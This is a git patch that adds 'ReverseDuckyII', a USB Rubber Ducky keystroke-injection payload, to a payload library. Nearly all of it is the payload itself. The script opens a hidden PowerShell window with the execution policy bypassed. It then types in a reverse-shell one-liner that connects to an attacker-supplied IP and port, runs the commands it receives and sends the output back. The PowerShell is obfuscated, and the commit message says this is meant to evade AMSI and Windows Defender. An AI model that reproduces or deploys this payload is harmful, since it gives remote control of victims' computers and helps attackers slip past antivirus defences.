From 59cc824b0f6f785f01078d9e8a3ad12c7fc7035c Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Thu, 5 Aug 2021 10:52:17 +0200
Subject: [PATCH] Uploaded ReverseDuckyII

ReverseDucky2 - A faster way to gain a reverse shell & easier to configure Obfuscated Powershell code to bypass AMSI & Windows Defender.
---
 .../payloads/remote_access/ReverseDuckyII.txt | 35 +++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 library/payloads/remote_access/ReverseDuckyII.txt

diff --git a/library/payloads/remote_access/ReverseDuckyII.txt b/library/payloads/remote_access/ReverseDuckyII.txt
new file mode 100644
index 0000000..e43740b
--- /dev/null
+++ b/library/payloads/remote_access/ReverseDuckyII.txt
@@ -0,0 +1,35 @@ +REM ReverseDucky2 +REM Version 1.0 +REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) +REM Author: 0iphor13 + +REM Reverse shell executed in the background +REM Fill in Attacker-IP and Port in Line 19 +REM DON'T FORGET TO START LISTENER + + +DELAY 1500 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W hidden -Exec Bypass +DELAY 250 +ENTER + +DELAY 200 +STRING $IP='0.0.0.0';$Port=4444;$client = .('N'+'ew-O'+'bject') sYSteM.neT.soCKETs.TcPCLient +DELAY 200 +STRING ($IP,$Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|.('%'){0};while(($i = $s +DELAY 200 +STRING tream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (.('Ne'+'w-O'+'bject') -TypeName SystE +DELAY 200 +STRING M.tEXt.aSCiIEnCodinG).GetString($bytes,0, $i);$sendback = (.('i'+'ex') $data 2>&1 | .('Ou +DELAY 200 +STRING t-'+'Str'+'in'+'g') );$sendback2 = $sendback + 'PS ' + (&('p'+'wd')).Path + '> ';$sendbyt +DELAY 200 +STRING e = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len +DELAY 200 +STRING gth);$stream.Flush()};$client.Close() +DELAY 100 +ENTER + 